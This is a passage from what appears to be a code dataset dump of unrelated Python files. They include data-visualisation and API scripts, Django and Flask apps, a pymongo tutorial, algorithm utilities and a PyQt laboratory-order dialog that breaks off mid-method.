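s = np.linalg.svd(X, compute_uv=False)
d = np.linalg.svd(X.T @ X, compute_uv=False)
print(np.allclose(d, s ** 2))                       # True: H's singular values are s squared
print(np.isclose(s[0] / s[-1], np.linalg.cond(X)))  # True: cond is s_max / s_min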
1)\nfig.show(renderer = 'browser')\n\nfig = px.scatter_matrix(stocks[features])\nplt.title(\"Original Feature Space\")\nplt.tight_layout()\nfig.show(renderer = 'browser')\n\nfig = px.scatter_matrix(df_PCA[column])\nplt.title(\"Reduced Feature Space\")\nplt.tight_layout()\nfig.show(renderer = 'browser')","repo_name":"lydiateinfalt/DATS6401-DataVisualization-Spring22","sub_path":"Lab/Lab4_LydiaTeinfalt_DATS6401.py","file_name":"Lab4_LydiaTeinfalt_DATS6401.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19310952452","text":"import requests\nimport pandas as pd\n\ndef run_query(query):\n response = requests.post('https://tarkov-tools.com/graphql', json={'query': query})\n if response.status_code == 200:\n return response.json()\n else:\n raise Exception(\"Query failed to run by returning code of {}. {}\".format(response.status_code, query))\n\n\nnew_query = \"\"\"\nquery {\n crafts {\n source\n duration\n rewardItems {\n quantity\n item {\n shortName\n lastLowPrice\n }\n }\n requiredItems {\n quantity\n item {\n shortName\n lastLowPrice\n }\n }\n }\n}\n\"\"\"\n\nresult = run_query(new_query)\n# print(result)\n\ndef filterByStation(station_id,data):\n my_columns = ['station', 'name', 'output_price', 'duration', 'input_price', 'profit', 'profit_per_hour']\n df = pd.DataFrame(columns=my_columns)\n duration = 0\n for item in data[\"data\"][\"crafts\"]:\n # if item[\"source\"] == 'Booze generator level 1':\n duration = round((item[\"duration\"]) / 60 / 60, ndigits=3)\n # for item2 in item[\"rewardItems\"]:\n reward = item[\"rewardItems\"]\n name_output = reward[0][\"item\"][\"shortName\"]\n input_price = 0\n quantity = reward[0][\"quantity\"]\n output_item = reward[0][\"item\"][\"lastLowPrice\"]\n if output_item is None:\n output_item = 0\n output_price = quantity * int(output_item)\n station_name = item[\"source\"]\n for item2 in range(len(item[\"requiredItems\"])):\n # print(item[\"requiredItems\"][item2][\"quantity\"])\n quantity_i = item[\"requiredItems\"][item2][\"quantity\"]\n print(item[\"requiredItems\"][item2][\"item\"][\"lastLowPrice\"])\n aitem = item[\"requiredItems\"][item2][\"item\"][\"lastLowPrice\"]\n if aitem is None:\n aitem = 0\n price_of_items = aitem * quantity_i\n input_price = input_price + price_of_items\n profit = output_price - input_price\n profit_p_hour = round(profit / duration, ndigits=3)\n df = df.append(\n pd.Series([station_name, name_output, output_price, duration, input_price, profit, profit_p_hour],\n index=my_columns), ignore_index=True)\n return df\n\nprint(filterByStation(\"Nutrition unit level 1\",result))\n# print(filterByStation(\"Nutrition unit level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Nutrition unit level 3\",result).sort_values(by=['profit per hour'],ascending=False))\n#\n# print(filterByStation(\"Lavatory level 1\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Lavatory level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Lavatory level 3\",result).sort_values(by=['profit per hour'],ascending=False))\n#\n# print(filterByStation(\"Medstation level 1\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Medstation level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Medstation level 3\",result).sort_values(by=['profit per 
hour'],ascending=False))\n#\n# print(filterByStation(\"Workbench level 1\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Workbench level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Workbench level 3\",result).sort_values(by=['profit per hour'],ascending=False))\n","repo_name":"JachymDolezal/TarkovCraftBot","sub_path":"TestScripts/TestOfAPI.py","file_name":"TestOfAPI.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15148220491","text":"\"\"\"Show example images from specified imagenet categories\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport nengo_extras.data\nfrom nengo_extras.matplotlib import tile\n\nimages, labels, data_mean, label_names = nengo_extras.data.load_ilsvrc2012()\n\n# images, labels, data_mean, label_names = (\n# nengo_extras.data.load_ilsvrc2012(n_files=1))\n\nfor s in label_names:\n print(s)\n\nplt.figure()\n# show = 'butcher'\nshow_names = ['butcher', 'restaurant', 'planetarium', 'church', 'library']\n\nfor i, show_name in enumerate(show_names):\n match = [s.startswith(show_name) for s in label_names]\n index = match.index(True) if True in match else None\n mask = (labels == index) if index is not None else None\n count = mask.sum() if mask is not None else None\n if count is not None:\n print(\"Found %d matches for %r: showing index %d, %d examples\" % (\n sum(match), show_name, index, count))\n\n plt.subplot(len(show_names), 1, i+1)\n tile(np.transpose(images[mask].reshape(-1, 3, 256, 256), (0, 2, 3, 1)),\n rows=3, cols=5)\n\nplt.show()\n","repo_name":"hunse/phd","sub_path":"scripts/supporting_figures/imagenet_categories.py","file_name":"imagenet_categories.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"74213213368","text":"'''\r\nDjango tests for views.\r\n'''\r\n\r\nfrom django.test import TestCase, Client\r\nfrom django.urls import reverse\r\nimport json\r\n\r\n\r\nclass TestViews(TestCase):\r\n '''\r\n Class with unittests for views.\r\n '''\r\n def setUp(self):\r\n '''\r\n Set up for tests.\r\n '''\r\n self.client = Client()\r\n self.form_url = reverse(\"index\")\r\n self.form_url_II = reverse(\"create\")\r\n\r\n def test_GET_index(self):\r\n '''\r\n GET method for index, tests.\r\n '''\r\n response = self.client.get(self.form_url)\r\n\r\n self.assertEqual(response.status_code, 200)\r\n # below looks at dir templates\r\n self.assertTemplateUsed(response, 'index.html')\r\n\r\n","repo_name":"JakubKazimierski/PythonPortfolio","sub_path":"Django/Django_three_projects/urlshortner/shortner/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"40153102040","text":"from flask import Flask, Response, render_template\nimport cv2\n\napp = Flask(__name__)\n\n# working code for video streaming =============================\n# remaining to work with the end part of opencv\n\n\ncamera = cv2.VideoCapture(0)\n\"\"\"\n Creates video object using the webcam (0)\n \n Video Capture of cv2 library is used to create an camera object\n which references the webcam.\n\"\"\"\ndef gen_frames():\n \"\"\"\n Function to get frames using the opencv\n \"\"\" \n while True:\n success, frame = camera.read() # read the camera frame\n if 
not success:\n break\n else:\n ret, buffer = cv2.imencode('.jpg', frame)\n frame = buffer.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n\n# @app.route(\"/hello\")\n# def hello_world():\n# return \"

Hello, World!

\"\n\n\n\n# @app.route(\"/\")\n# def stream_video():\n# get_image_frame()\n# return \"

Hello, World!

\"\n\n# def get_image_frame():\n# import cv2 as cv\n# video = cv.VideoCapture(0)\n# while True:\n# return_value, frame = video.read()\n# cv.imshow(\"Image window\", frame)\n# key = cv.waitKey(1)\n# if key == ord(\"q\"):\n# break\n# video.release()\n# cv.destroyAllWindows()\n# cv.waitKey(1)\n\n\n# @app.route(\"/check\")\n# def check():\n# return Response(gen_function())\n\n# @app.route(\"/\")\n# def check2():\n# return Response(gen_template_function())\n\n# def gen_function():\n# yield \"

Hello, World!

\"\n# for i in range(19):\n# yield \"

Hello, World! middle

\"\n# yield \"

Hello, World! foooter

\"\n\n# def gen_template_function():\n# yield render_template(\"header.html\")\n# for i in range(19):\n# yield render_template(\"body.html\")\n# yield render_template(\"footer.html\")\n\n\n# from flask import Flask, render_template, Response\n# from camera import Camera\n\n# app = Flask(__name__)\n\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n\n# def gen(camera):\n# while True:\n# frame = camera.get_frame()\n# yield (b'--frame\\r\\n'\n# b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n# @app.route('/video_feed')\n# def video_feed():\n# return Response(gen(Camera()),\n# mimetype='multipart/x-mixed-replace; boundary=frame')\n\n# if __name__ == '__main__':\n# app.run(host='0.0.0.0', port= 8989, debug=True)","repo_name":"bisalgt/playground","sub_path":"flask-videstreamer/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"69953342970","text":"def timer(func):\n def func_wrapper(*args, **kwargs):\n from time import time\n time_start = time()\n result = func(*args, **kwargs)\n time_end = time()\n print('{0} cost time {1} s'.format(func.__name__, time_end - time_start))\n\n return result\n\n return func_wrapper\n\n\ndef load_edge_list(filepath: str) -> (list, list):\n n, m, nodes, edges = 0, 0, [], []\n with open(filepath, 'r') as f:\n # n->number of nodes, m->number of edges\n n, m = [int(item) for item in f.readline().strip().split()]\n for _ in range(m): # read edges\n start_node, end_node = [int(item) for item in f.readline().strip().split()]\n edges.append((start_node, end_node))\n nodes = [item for item in range(1, n + 1)]\n print(f\"Load {len(edges)} edges, {len(nodes)} nodes from {filepath}\")\n return nodes, edges\n\n\ndef load_graph_from_edge_list(filepath: str, undirected: bool = False):\n nodes, edges = load_edge_list(filepath)\n graph = {node: [] for node in nodes}\n for start_node, end_node in edges:\n graph[start_node].append(end_node)\n if undirected:\n graph[end_node].append(start_node)\n return nodes, graph\n\n\ndef load_n_list(filepath: str) -> (int, list):\n with open(filepath, 'r', encoding='utf-8') as f:\n n_elems = int(f.readline().strip())\n elems = [int(item) for item in f.readline().strip().split()]\n return n_elems, elems\n\n\ndef load_arrs(filepath: str) -> (int, int, list):\n with open(filepath, 'r', encoding='utf-8') as f:\n n_arrs, arr_len = [int(item) for item in f.readline().strip().split()]\n arrs = [[int(elem) for elem in f.readline().strip().split()] for _ in range(n_arrs)]\n print(f\"Load {n_arrs} lists, each list has {arr_len} elems\")\n return n_arrs, arr_len, arrs\n\n\ndef breath_first_search(nodes: list, graph: dict, start_node):\n if start_node not in nodes:\n return\n # init queue, order and distance dict\n queue, order = [], []\n distance = {node: 0 for node in nodes}\n queue.append(start_node)\n order.append(start_node)\n # start search\n while queue:\n v = queue.pop(0)\n for n in graph[v]:\n if n not in order:\n distance[n] = distance[v] + 1\n order.append(n)\n queue.append(n)\n # mark unreachable node's distance as -1\n for n in nodes:\n if n not in order:\n distance[n] = -1\n return order, distance\n\n\ndef degree_array(nodes: list, edges: list) -> list:\n da_dict = {node: 0 for node in nodes}\n for start_node, end_node in edges:\n da_dict[start_node] += 1\n da_dict[end_node] += 1\n return [da_dict[node] for node in nodes]\n\n\ndef list_2_str(x: list, sep: str = 
' '):\n return sep.join([str(item) for item in x])\n\n\ndef swap(arr: list, pos1: int, pos2: int):\n arr[pos1], arr[pos2] = arr[pos2], arr[pos1]\n\n\ndef sort_with_pos(x: list) -> (list, list):\n elem_pos_tuples = [(x[pos], pos) for pos in range(len(x))]\n elem_pos_tuples = sorted(elem_pos_tuples, key=lambda t: t[0])\n\n sorted_x = [t[0] for t in elem_pos_tuples]\n sorted_pos = [t[1] for t in elem_pos_tuples]\n\n return sorted_x, sorted_pos\n","repo_name":"xwmp3/rosalind-python","sub_path":"algorithmic-heights/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9077382831","text":"import socket\nimport osc_decoder\nimport asyncio\nimport websockets\nimport json\n\n# ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\n# Inputs\nudp_port = 8239 # Same as UDP send port in NGIMU settings\nws_port = 8888\n# ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\n\n# Create a UDP socket at client side\nUDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n# binding\nUDPClientSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nUDPClientSocket.bind((\"\", udp_port))\n\n\nasync def handler(websocket, path):\n while True:\n try:\n msgFromServer, addr = UDPClientSocket.recvfrom(1024)\n\n # Everything was ok with this code, the threading it self is not required I guess\n await websocket.send(json.dumps(osc_decoder.decode(msgFromServer)))\n\n # This right here was the problem, if not called to sleep, data would buffer up and only send in batch\n await asyncio.sleep(0)\n\n except socket.error as e:\n print(e)\n pass\n\nif __name__ == '__main__':\n start_server = websockets.serve(handler, \"127.0.0.1\", ws_port)\n\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()","repo_name":"joaohenriqueluz/VSB-STeH","sub_path":"ngimu/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14156807607","text":"import logging\nimport uuid\nimport urlparse\n\nfrom website import settings\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass GraphNode(object):\n\n @property\n def ref(self):\n return {'@id': self.id, '@type': self.type}\n\n def __init__(self, type_, **attrs):\n self.id = '_:{}'.format(uuid.uuid4())\n self.type = type_.lower()\n self.attrs = attrs\n\n def get_related(self):\n for value in self.attrs.values():\n if isinstance(value, GraphNode):\n yield value\n elif isinstance(value, list):\n for val in value:\n yield val\n\n def serialize(self):\n ser = {}\n for key, value in self.attrs.items():\n if isinstance(value, GraphNode):\n ser[key] = value.ref\n elif isinstance(value, list) or value in {None, ''}:\n continue\n else:\n ser[key] = value\n\n return dict(self.ref, **ser)\n\n\ndef format_user(user):\n person = GraphNode('person', **{\n 'suffix': user.suffix,\n 'given_name': user.given_name,\n 'family_name': user.family_name,\n 'additional_name': user.middle_names,\n })\n\n person.attrs['identifiers'] = [GraphNode('agentidentifier', agent=person, uri='mailto:{}'.format(uri)) for uri in user.emails]\n\n if user.is_registered:\n person.attrs['identifiers'].append(GraphNode('agentidentifier', agent=person, uri=user.profile_image_url()))\n person.attrs['identifiers'].append(GraphNode('agentidentifier', agent=person, uri=urlparse.urljoin(settings.DOMAIN, 
user.profile_url)))\n\n person.attrs['related_agents'] = [GraphNode('isaffiliatedwith', subject=person, related=GraphNode('institution', name=institution.name)) for institution in user.affiliated_institutions.all()]\n\n return person\n\n\ndef format_contributor(preprint, user, bibliographic, index):\n return GraphNode(\n 'creator' if bibliographic else 'contributor',\n agent=format_user(user),\n order_cited=index if bibliographic else None,\n creative_work=preprint,\n cited_as=user.fullname,\n )\n","repo_name":"Rheisen/osf.io","sub_path":"website/util/share.py","file_name":"share.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"43198015264","text":"import pymongo\r\n\r\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydb = myclient[\"mydatabase\"]\r\nmycol = mydb[\"customers\"]\r\n\r\nprint(\"\\n\\t\\t Delete Address Mountain 21\")\r\nmyquery = { \"address\": \"Mountain 21\" }\r\nmycol.delete_one(myquery)\r\n\r\n\r\nprint(\"Delete address: {$regex: ^S}\")\r\nmyquery = { \"address\": {\"$regex\": \"^S\"} }\r\nx = mycol.delete_many(myquery)\r\n\r\nprint(x.deleted_count, \" documents deleted.\")\r\n\r\n\r\nprint(\"Delete All\")\r\nx = mycol.delete_many({})\r\n\r\nprint(\"Drop collection\")\r\nmycol.drop()\r\nprint(x.deleted_count, \" documents deleted.\")","repo_name":"aatmasidha/pythonmongodb","sub_path":"mongodelete.py","file_name":"mongodelete.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18014880862","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.http import HttpResponseRedirect\nfrom .forms import TaskForm\nfrom django.utils import timezone\nfrom .basa import *\n\n\nclass ExitPage(View):\n def get(self, request):\n context = {}\n return render(request, 'exit.html', context=context)\n\n def post(self, request):\n login = request.POST.get(\"login\")\n password = request.POST.get(\"password\")\n users = autoriz(login, password)\n if not users:\n context = {\n \"message\": \"Введен не правильный пароль или логин\"\n }\n return render(request, 'exit.html', context=context)\n else:\n request.session[\"id_user\"] = users[0].id\n return HttpResponseRedirect('index.html')\n\n\nclass MainPage(View):\n def get(self, request):\n date_today = timezone.now()\n tasks = get_task(request.session['id_user'])\n context = {\n \"tasks\": tasks,\n \"date_today\": date_today\n }\n return render(request, 'index.html', context=context)\n\n\nclass AddPage(View):\n def get(self, request):\n date_today = timezone.now()\n user_id = request.session['id_user']\n context = {\n \"form\": TaskForm,\n \"date_today\": date_today,\n 'user_id': user_id\n }\n return render(request, 'add.html', context=context)\n\n def post(self, request):\n error = \"\"\n\n if request.method == 'POST':\n form = TaskForm(request.POST)\n if form.is_valid():\n uform = form.save(commit=False)\n uform.status = \"Невыполнен\"\n uform.User_id_id = request.session['id_user']\n uform.save()\n return redirect('index.html')\n else:\n error = \"Ошибка формы\"\n else:\n form = TaskForm()\n context = {\n 'form': form,\n 'error': error\n }\n return render(request, 'add.html', 
context=context)\n","repo_name":"Roman373/isapp","sub_path":"pulls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40422551339","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui\n\nfrom Events.CreateEvent import editEvent\nfrom Ui_OrderListDialog import Ui_OrderListDialog\nfrom library.DialogBase import CDialogBase\nfrom library.Enum import CEnum\nfrom library.LoggingModule.Logger import getLoggerDbName\nfrom library.TableModel import CDateTimeCol, CEnumCol, CTableModel, CTextCol\nfrom library.Utils import forceRef, forceString, getPref, setPref\nfrom library.database import CTableRecordCache\n\n\nclass OrderStatus(CEnum):\n NotSent = 0\n AwaitingResult = 1\n Finished = 2\n Outdated = 3\n HasError = 4\n\n nameMap = {\n NotSent : u'Не отправлено',\n AwaitingResult: u'Отправлено',\n Finished : u'Закончено',\n Outdated : u'Устаревшая',\n HasError : u'Ошибка отправки'\n }\n\n\nclass OrderSyncStatus(CEnum):\n OrderSent = 0\n ResultReceived = 1\n NoBundleData = 2\n ResultNotReceived = 3\n IncorrectPersonIdentifier = 4\n RequestError = 5\n TerminologyServiceError = 6\n PartialResultReceived = 7\n NoSpecimenType = 8\n NoDiagnosticOrderItems = 9\n Outdated = 90\n Exception = 99\n\n nameMap = {\n OrderSent : u'Отправлен',\n ResultReceived : u'Получен результат',\n NoBundleData : u'Заявка изменена/удалена',\n ResultNotReceived : u'Результат не готов',\n IncorrectPersonIdentifier: u'Некорректный идентификатор исполнителя',\n RequestError : u'Ошибка запроса к ОДЛИ',\n TerminologyServiceError : u'Не валидировано сервисом Терминологии',\n PartialResultReceived : u'Получен неполный результат',\n NoSpecimenType : u'Не указан тип биоматериала',\n NoDiagnosticOrderItems : u'Не указаны коды заявок',\n Outdated : u'Устаревшая',\n Exception : u'Внтуренняя ошибка'\n }\n\n\nclass OrderResponseStatus(CEnum):\n Created = 0\n NotSent = 1\n Finished = 2\n Outdated = 3\n HasError = 4\n\n nameMap = {\n Created : u'Создан',\n NotSent : u'Не отправлен',\n Finished: u'Отправлен',\n Outdated: u'Устаревший',\n HasError: u'Ошибка отправки'\n }\n\n\nclass OrderResponseSyncStatus(CEnum):\n OrderReceived = 0\n ResultSent = 1\n NoBundleData = 2\n PersonNotSet = 3\n IncorrectPersonIdentifier = 4\n RequestError = 5\n OrderNotReceived = 6\n NoObservations = 7\n NoDiagnosticReports = 8\n IncorrectOrderIdentifier = 9\n NoSpecimenType = 10\n InternalOrderNotFound = 11\n TerminologyServiceError = 12\n Outdated = 90\n Exception = 99\n\n nameMap = {\n OrderReceived : u'Получена заявка',\n ResultSent : u'Результат отправлен',\n\n NoBundleData : u'Результат изменен/удален',\n PersonNotSet : u'Не указан исполнитель',\n IncorrectPersonIdentifier: u'Некорректный идентификатор исполнителя',\n RequestError : u'Ошибка запроса к ОДЛИ',\n OrderNotReceived : u'Заявка не получена',\n NoObservations : u'Не указаны результаты тестов',\n NoDiagnosticReports : u'Не заполнены результаты исследования',\n # IncorrectOrderIdentifier : 'INCORRECT ORDER IDENTIFIER',\n NoSpecimenType : u'Не указан тип биоматериала',\n InternalOrderNotFound : u'Не найдена внутренняя заявка',\n TerminologyServiceError : u'Не валидировано сервисом Терминологии',\n Outdated : u'Устаревший',\n\n Exception : u'Внутренняя ошибка'\n }\n\n\nclass COrderModel(CTableModel):\n u\"\"\" МИС-часть: заявки на лабораторные исследования \"\"\"\n fetchSize = 100\n\n def __init__(self, parent):\n super(COrderModel, self).__init__(parent, 
cols=[\n CTextCol(u'Идентификатор МИС', ['orderMisId'], 10),\n CTextCol(u'Идентификатор ЛИС', ['orderUUID'], 10),\n CTextCol(u'Штрих-код', ['externalId'], 10),\n CTextCol(u'ФИО пациента', ['clientName'], 25),\n CTextCol(u'Биоматериал', ['tissueTypeName'], 15),\n CDateTimeCol(u'Создано', ['datetime'], 20),\n CDateTimeCol(u'Отправлено', ['sentDatetime'], 20),\n CDateTimeCol(u'Получено', ['receivedDatetime'], 20),\n CEnumCol(u'Статус', ['status'], OrderStatus, 20),\n CEnumCol(u'Текущее состояние', ['lastSyncStatus'], OrderSyncStatus, 20, notPresentValue='-'),\n CTextCol(u'Текст ошибки', ['error'], 20, toolTipValue=True)\n ])\n self.setTable('')\n\n def setTable(self, tableName, recordCacheCapacity=300):\n db = QtGui.qApp.db\n tableClient = db.table('Client')\n tableEvent = db.table('Event')\n tableOrder = db.table('{0}.N3LabOrderLog'.format(getLoggerDbName()))\n tableOrderSync = db.table('{0}.N3LabOrderSyncLog'.format(getLoggerDbName()))\n tableOrderSent = tableOrderSync.alias('OrderSent')\n tableOrderRecv = tableOrderSync.alias('OrderRecv')\n tableOrderCurrent = tableOrderSync.alias('OrderCurrent')\n tableTissueType = db.table('rbTissueType')\n tableTTJ = db.table('TakenTissueJournal')\n\n table = tableOrder\n table = table.leftJoin(tableOrderSent,\n tableOrderSent['id'].eqStmt(\n db.selectMin(tableOrderSync,\n tableOrderSync['id'],\n [tableOrderSync['order_id'].eq(tableOrder['id']),\n tableOrderSync['status'].eq(OrderSyncStatus.OrderSent)])\n ))\n table = table.leftJoin(tableOrderRecv,\n tableOrderRecv['id'].eqStmt(\n db.selectMax(tableOrderSync,\n tableOrderSync['id'],\n [tableOrderSync['order_id'].eq(tableOrder['id']),\n tableOrderSync['status'].eq(OrderSyncStatus.ResultReceived)])\n ))\n table = table.leftJoin(tableOrderCurrent,\n tableOrderCurrent['id'].eqStmt(\n db.selectMax(tableOrderSync,\n tableOrderSync['id'],\n tableOrderSync['order_id'].eq(tableOrder['id']))\n ))\n table = table.leftJoin(tableEvent, tableEvent['id'].eq(tableOrder['event_id']))\n table = table.leftJoin(tableClient, tableClient['id'].eq(tableEvent['client_id']))\n table = table.leftJoin(tableTTJ, tableTTJ['id'].eq(tableOrder['takenTissueJournal_id']))\n table = table.leftJoin(tableTissueType, tableTissueType['id'].eq(tableTTJ['tissueType_id']))\n\n cols = [\n tableOrder['orderMisId'],\n tableOrder['orderUUID'],\n tableOrder['datetime'],\n tableOrder['status'],\n tableOrder['event_id'],\n tableOrderCurrent['error'],\n db.concat_ws(' ', tableClient['lastName'], tableClient['firstName'], tableClient['patrName']).alias('clientName'),\n tableTTJ['externalId'],\n tableTissueType['name'].alias('tissueTypeName'),\n tableOrderCurrent['status'].alias('lastSyncStatus'),\n tableOrderSent['datetime'].alias('sentDatetime'),\n tableOrderRecv['datetime'].alias('receivedDatetime')\n ]\n\n self._table = table\n self._recordsCache = CTableRecordCache(db, self._table, cols, recordCacheCapacity)\n\n def isEditable(self):\n return True\n\n\nclass COrderResponseModel(CTableModel):\n u\"\"\" ЛИС-часть: результаты лабораторных исследований \"\"\"\n fetchSize = 100\n\n def __init__(self, parent):\n super(COrderResponseModel, self).__init__(parent, cols=[\n CTextCol(u'Идентификатор заявки в ЛИС', ['orderUUID'], 10),\n CTextCol(u'Идентификатор ЛИС', ['orderResponseUUID'], 10),\n CTextCol(u'ФИО пациента', ['clientName'], 25),\n CDateTimeCol(u'Дата создания', ['datetime'], 20),\n CDateTimeCol(u'Дата отправки', ['sentDatetime'], 20),\n CEnumCol(u'Статус', ['status'], OrderResponseStatus, 20),\n CEnumCol(u'Текущее состояние', ['lastSyncStatus'], 
OrderResponseSyncStatus, 20, notPresentValue='-'),\n CTextCol(u'Текст ошибки', ['error'], 20)\n ])\n self.setTable('')\n\n def setTable(self, tableName, recordCacheCapacity=300):\n db = QtGui.qApp.db\n tableClient = db.table('Client')\n tableEvent = db.table('Event')\n tableOrderResponse = db.table('{0}.N3LabOrderResponseLog'.format(getLoggerDbName()))\n tableOrderResponseSync = db.table('{0}.N3LabOrderResponseSyncLog'.format(getLoggerDbName()))\n tableOrderResponseSent = tableOrderResponseSync.alias('OrderResponseSent')\n tableOrderResponseCurrent = tableOrderResponseSync.alias('OrderResponseCurrent')\n\n table = tableOrderResponse\n table = table.leftJoin(tableOrderResponseSent,\n tableOrderResponseSent['id'].eqStmt(\n db.selectMin(tableOrderResponseSync,\n tableOrderResponseSync['id'],\n [tableOrderResponseSync['orderResponse_id'].eq(tableOrderResponse['id']),\n tableOrderResponseSync['status'].eq(OrderResponseSyncStatus.ResultSent)])\n ))\n table = table.leftJoin(tableOrderResponseCurrent,\n tableOrderResponseCurrent['id'].eqStmt(\n db.selectMax(tableOrderResponseSync,\n tableOrderResponseSync['id'],\n tableOrderResponseSync['orderResponse_id'].eq(tableOrderResponse['id']))\n ))\n table = table.leftJoin(tableEvent, tableEvent['id'].eq(tableOrderResponse['event_id']))\n table = table.leftJoin(tableClient, tableClient['id'].eq(tableEvent['client_id']))\n\n cols = [\n tableOrderResponse['orderUUID'],\n tableOrderResponse['orderResponseUUID'],\n tableOrderResponse['datetime'],\n tableOrderResponse['status'],\n tableOrderResponse['event_id'],\n tableOrderResponseCurrent['error'],\n db.concat_ws(' ', tableClient['lastName'], tableClient['firstName'], tableClient['patrName']).alias('clientName'),\n tableOrderResponseCurrent['status'].alias('lastSyncStatus'),\n tableOrderResponseSent['datetime'].alias('sentDatetime')\n ]\n\n self._table = table\n self._recordsCache = CTableRecordCache(db, self._table, cols, recordCacheCapacity)\n\n def isEditable(self):\n return True\n\n\nclass CLabOrderListDialog(CDialogBase, Ui_OrderListDialog):\n def __init__(self, parent):\n super(CLabOrderListDialog, self).__init__(parent)\n self.preSetupUi()\n self.setupUi(self)\n self.postSetupUi()\n\n def preSetupUi(self):\n self.actOpenOrderEvent = QtGui.QAction(u'Перейти к обращению', self)\n self.actOpenOrderEvent.setObjectName('actOpenOrderEvent')\n self.actOpenOrderResponseEvent = QtGui.QAction(u'Перейти к обращению', self)\n self.actOpenOrderResponseEvent.setObjectName('actOpenOrderResponseEvent')\n self.actResendOrder = QtGui.QAction(u'Отправить заново', self)\n self.actResendOrder.setObjectName('actResendOrder')\n self.actResendOrderResponse = QtGui.QAction(u'Отправить заново', self)\n self.actResendOrderResponse.setObjectName('actResendOrderResponse')\n\n self.addModels('Order', COrderModel(self))\n self.addModels('OrderResponse', COrderResponseModel(self))\n\n def postSetupUi(self):\n self.setWindowFlags(QtCore.Qt.Dialog | QtCore.Qt.WindowMaximizeButtonHint | QtCore.Qt.WindowCloseButtonHint)\n\n self.setModels(self.tblOrder, self.modelOrder, self.selectionModelOrder)\n self.tblOrder.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n self.tblOrder.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)\n self.tblOrder.createPopupMenu([self.actOpenOrderEvent,\n self.actResendOrder])\n self.connect(self.tblOrder.popupMenu(), QtCore.SIGNAL('aboutToShow()'), self.onOrderPopupMenuAboutToShow)\n\n self.cmbOrderStatus.setEnum(OrderStatus, addNone=True)\n self.cmbOrderSyncStatus.setEnum(OrderSyncStatus, 
addNone=True)\n self.edtOrderDateFrom.setDate(QtCore.QDate.currentDate())\n self.edtOrderDateTo.setDate(QtCore.QDate.currentDate())\n\n self.setModels(self.tblOrderResponse, self.modelOrderResponse, self.selectionModelOrderResponse)\n self.tblOrderResponse.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n self.tblOrderResponse.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)\n self.tblOrderResponse.createPopupMenu([self.actOpenOrderResponseEvent,\n self.actResendOrderResponse])\n self.connect(self.tblOrderResponse.popupMenu(), QtCore.SIGNAL('aboutToShow()'), self.onOrderResponsePopupMenuAboutToShow)\n\n self.cmbOrderResponseStatus.setEnum(OrderResponseStatus, addNone=True)\n self.cmbOrderResponseSyncStatus.setEnum(OrderResponseSyncStatus, addNone=True)\n self.edtOrderResponseDate.setDate(QtCore.QDate.currentDate())\n\n self.btnClose.clicked.connect(self.close)\n\n def loadPreferences(self, preferences):\n self.tblOrder.loadPreferences(getPref(preferences, 'tblOrder)', {}))\n 